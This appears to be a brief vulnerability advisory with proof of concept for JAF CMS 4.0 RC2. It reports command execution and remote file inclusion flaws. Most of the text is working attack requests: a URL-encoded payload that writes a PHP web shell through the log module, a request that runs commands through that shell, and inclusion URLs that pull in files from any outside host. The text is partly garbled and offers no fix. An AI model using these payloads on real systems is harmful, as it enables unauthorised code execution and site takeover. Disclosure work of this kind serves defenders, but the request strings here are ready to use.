Jaf cms is a content management system used to create a personal homepage. jaf cms 4.0 RC2 has multiple security vulnerabilities, including command execution and Remote File Inclusion vulnerabilities.
[+] Info:
~~~~~~~~~
Jaf cms 4.0 RC2 Multiple Vulnerabilities
Product: JAF CMS
Vendor: jaf cms (http://jaf-cms.sourceforge.net /)
Vulnerable Version: 4.0 RC2
Vendor Notification: 21 October 2010
[+] Poc:
~~~~~~~~~
Shell create & command execution:
Creating shell:
PHP_SELF % 27] = 1 & from = % 3c % 3f + system (% 24_GET % 5b % 27cmd % 27% 5d) % 3b + % 3f % 3e & root = .. /.. /123.php% 00 "> http: // [host]/module/log/vislog. php? _ SERVER [% 27PHP_SELF % 27] = 1 & from = % 3c % 3f + system (% 24_GET % 5b % 27cmd % 27% 5d) % 3b + % 3f % 3e & root = .. /.. /123.php% 00
Command execute:
Http: // [host]/123.php? Cmd = ls
Remote File Upload sion:
Http: // [host]/module/forum/main. php? Website = http: // any_host/any_file % 00
Http: // [host]/module/forum. php? Website = http: // any_host/any_file % 00
Solution:
Provided later